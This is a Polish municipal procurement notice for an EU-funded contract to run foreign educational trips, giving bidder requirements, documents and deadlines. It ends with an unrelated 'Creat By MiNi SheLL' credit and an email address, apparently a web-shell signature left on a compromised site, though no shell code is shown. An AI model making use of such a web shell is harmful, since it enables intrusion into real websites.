13.	Dokumentowanie warsztatów poprzez dokumenty projektowe w szczególności: dzienniki, karty czasu pracy, listy obecności, sprawozdania.

UWAGA:
Zamawiający wymaga, aby wykonawca posiadał wpis do Centralnej Ewidencji Organizatorów Turystyki i Pośredników turystycznych prowadzonej przez Ministra Sportu 
i Turystyki, a w przypadku przedsiębiorcy zagranicznego posiadającego siedzibę na terytorium państwa członkowskiego Unii Europejskiej, państwa członkowskiego Europejskiego Porozumienia o Wolnym Handlu (EFTA) - strony umowy o Europejskim Obszarze Gospodarczym lub Konfederacji Szwajcarskiej, za spełnienie warunku prowadzenia działalności, o którym mowa w art. 5 ust. 1 pkt 2 oraz ust. 1a i 1b ustawy z dnia 29 sierpnia 1997 r. o usługach turystycznych (t.j. Dz. U. z 2004 r. nr 223, poz. 2268 z późn. zm.) uznaje się posiadanie zabezpieczenia finansowego w formie, która jest uznawana 
w państwie, w którym przedsiębiorca posiada siedzibę. 
W/w dokument (kserokopia) potwierdzony za zgodność z oryginałem, wybrany wykonawca dostarczy zamawiającemu przed podpisaniem umowy.
Wykonawca zobowiązany jest do spełnienia warunków określonych w Rozporządzeniu Ministra Edukacji Narodowej i Sportu z dnia 8 listopada 2001 r. w sprawie warunków 
i sposobu organizowania przez publiczne przedszkola, szkoły i placówki krajoznawstwa 
i turystyki (Dz. U. Nr 135, poz. 1516 z późn. zm.) oraz w Rozporządzeniu Ministra Edukacji Narodowej z dnia 21 stycznia 1997 r. w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania (Dz. U. Nr 12, poz. 67 z późn. zm.)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 63.51.00.00-7, 63.51.10.00-4, 63.51.20.00-1, 63.51.50.00-2, 80.58.00.00-3, 63.50.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 04.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymaga się</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia / nie spełnia, na podstawie przedłożonego przez wykonawcę: 
       	- oświadczenia (zgodnie z art. 22 ust. 1 pkt. 1 ustawy pzp).
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, że warunek spełnia przynajmniej jeden z tych wykonawców.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonali należycie, w okresie ostatnich trzech lat przed upływem terminu składania ofert 
(a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), usługi (lub jedną




usługę), polegające na zorganizowaniu zagranicznych wyjazdów o łącznej wartości nie mniejszej niż 100 000,00 złotych brutto.
Ocena spełnienia warunku będzie dokonana wg zasady spełnia/nie spełnia, na podstawie przedłożonego przez wykonawcę:
- oświadczenia (zgodnie z art. 22 ust. 1 pkt. 2 ustawy pzp),
- wykazu wykonanych w/w usług z podaniem wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem,
- dokumentów (np. referencji) potwierdzających, że usługi te zostały wykonane należycie.
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia ocena warunku nastąpi łącznie.
Przez usługi wykonane należy rozumieć, wartości brutto wymaganych usług już zrealizowanych i odebranych (np. protokołem odbioru) do upływu terminu składania ofert.
W przypadku usług ciągłych, nadal wykonywanych (umów nie zakończonych np. z terminem realizacji w latach 2010 - 2013) przez usługi wykonane należy rozumieć wartości brutto wymaganych usług już zrealizowanych i odebranych (np. protokołem odbioru) do upływu terminu składania ofert.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednim potencjałem technicznym do wykonania zamówienia.
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia / nie spełnia, na podstawie przedłożonego przez wykonawcę:
- oświadczenia (zgodnie z art. 22 ust.1 pkt. 3 ustawy pzp).
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, że warunek spełnia przynajmniej jeden z tych wykonawców.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednimi osobami zdolnymi do wykonania zamówienia.
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia / nie spełnia, na podstawie przedłożonego przez wykonawcę:
- oświadczenia (zgodnie z art. 22 ust.1 pkt. 3 ustawy pzp).
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, że warunek spełnia przynajmniej jeden z tych wykonawców.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia:
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia / nie spełnia, na podstawie przedłożonego przez wykonawcę:
- oświadczenia (zgodnie z art. 22 ust.1 pkt. 4 ustawy pzp).


W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, że warunek spełnia przynajmniej jeden z tych wykonawców.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>A)Wykonawca przystępujący do postępowania złoży następujące oświadczenia: Oświadczenie z art. 22 ust. 1 ustawy pzp, że:
1)	posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2)	posiada wiedzę i doświadczenie do wykonania zamówienia;
3)	dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
4)	znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.

Wszystkie oświadczenia muszą być złożone w oryginale i podpisane przez osobę (osoby) uprawnione do zaciągania zobowiązań w imieniu wykonawcy.
Jeżeli wykonawca reprezentowany jest w postępowaniu przez pełnomocnika do oferty należy załączyć  pełnomocnictwo, w formie oryginału lub notarialnie poświadczonej kopii.
B) 1.	Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej    
dostarcza oświadczenia i dokumenty wymienione w pkt. Lista wymaganych oświadczeń oraz  w pkt. Lista wymaganych dokumentów.
Zamiast dokumentu, o którym mowa w punkcie 2 Listy wymaganych dokumentów, wykonawca przedstawia dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokument, o którym mowa powyżej, powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa powyżej, zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio w kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.



Termin ważności oświadczeń jest taki sam, jak dotyczący dokument, o którym mowa w pkt. 1 niniejszej uwagi.
2.	Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
3.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz
w przypadku podmiotów, o których mowa w § 1 ust. 2 i 3 w/w rozporządzenia, kopie dokumentów dotyczących odpowiednio wykonawcy lub podmiotów są poświadczane za zgodność z oryginałem przez wykonawcę lub te podmioty.
4.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach          zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów,   niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej  sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Treść zobowiązania podmiotu trzeciego złożonego w oryginale, powinna określać:
-  kto jest podmiotem przyjmującym zasoby,
-  zakres zobowiązania podmiotu trzeciego,
-  czego dotyczy zobowiązanie,
-  w jaki sposób będzie zobowiązanie wykonywane,
-  jakiego okresu dotyczy zobowiązanie.
5.	Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnienie opisanego przez zamawiającego  warunku.
6.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. konsorcjum/spółki cywilnej) do oferty należy dołączyć:
a.	 Pełnomocnictwo  określające zasady reprezentacji ze wskazaniem pełnomocnika (lidera), jego zakresu działania  i   uprawnień do reprezentowania wykonawców 
w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu 
i zawarcia umowy. 



Pełnomocnictwo  winno zawierać, w szczególności  :
- nazwy wszystkich wykonawców wspólnie ubiegający się o realizację zamówienia  
i udzielających pełnomocnictwa, 
- nazwę firmy Pełnomocnika/Lidera,
- zakres działania Pełnomocnika/Lidera, uprawnień do reprezentowania wykonawców 
w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu 
i zawarcia umowy, 
- czas trwania (zawiązania umowy wykonawców wspólnie ubiegających się o udzielenie zamówienia tzn. co najmniej okres obejmujący realizację zamówienia),
- cel zawarcia (wspólną realizację zamówienia publicznego),
- datę udzielenia pełnomocnictwa,
- podpisy wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia,  zgodne z zasadą ich reprezentacji.
Pełnomocnictwo należy załączyć w formie oryginału lub notarialnie poświadczonej kopii. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem/ Liderem. 
b.	Oświadczenia wymienione w pkt. V A SIWZ powinny być złożone w taki sposób, aby warunki, o których mowa w pkt. IV SIWZ, wykonawcy występujący wspólnie spełnili łącznie.
c.	Dokumenty wymienione w pkt. V B ppkt. 1 Listy wymaganych dokumentów powinny być złożone w taki sposób, aby warunki o których mowa w pkt IV SIWZ, wykonawcy występujący wspólnie spełnili łącznie. 
d.	Dokumenty wymienione w pkt V B ppkt. 2 i 3 Listy wymaganych dokumentów składa każdy z wykonawców wchodzących w skład podmiotu występującego wspólnie.
e.	Kopie dokumentów dotyczących wykonawcy powinny być poświadczane za zgodność 
z oryginałem przez wykonawcę, którego dokument dotyczy lub przez lidera lub przez wszystkich wykonawców wchodzących w skład tego podmiotu.
C) Do oferty zaleca się załączyć informacje w zakresie:
1)	Części zamówienia, która  zostanie powierzona podwykonawcom. W przypadku braku złożenia informacji w tym zakresie, zamawiający uzna, że wykonawca wykona całość zamówienia siłami własnymi bez powierzenia części zamówienia podwykonawcom.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ustawy Prawo Zamówień Publicznych, przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia: 
	zmiana terminu wykonania umowy:   
1.	zmiany spowodowane warunkami atmosferycznymi, które uniemożliwiają organizację wyjazdu, w szczególności:
a)	klęski żywiołowe;
b)	warunki atmosferyczne odbiegające od typowych dla danej pory roku, uniemożliwiające bezpieczny przewóz uczestników;
2.	w przypadku nie zakończenia procedury przetargowej i podpisania umowy do dnia terminu wyjazdu wskazanego w § 2 ust. 1;
	zmiana sposobu spełnienia świadczenia przez Wykonawcę:
1.	zmiana programu wyjazdu wynikająca z przyczyn nieleżących po stronie Wykonawcy.
Zmiana programu jest możliwa po przedstawieniu uzasadnienia i nowej propozycji programu przez Wykonawcę i zatwierdzeniu przez Zamawiającego. Nowy program nie może ustępować pod względem organizacyjnym i dydaktycznym programowi zgodnemu 
z załącznikiem nr 2 do niniejszej umowy (pkt II SIWZ);
	innych zmian, których nie można było przewidzieć na etapie sporządzania SIWZ, a które nie wykraczają poza zakres art. 140 ustawy Prawo zamówień publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bierun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Bieruniu, Referat Zamówień Publicznych 43-150 Bieruń, ul. Rynek 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.09.2012 godzina 10:00, miejsce: Urząd Miejski w Bieruniu - SEKRETARIAT (pok. nr. 9,  I piętro, segment A) 43-150 Bieruń, ul. Rynek 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 
Priorytet IX Rozwój wykształcenia i kompetencji w regionach 
Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty
Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup 
o utrudnionym dostępie do edukacji oraz zmniejszenie
 różnic w jakości usług edukacyjnych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com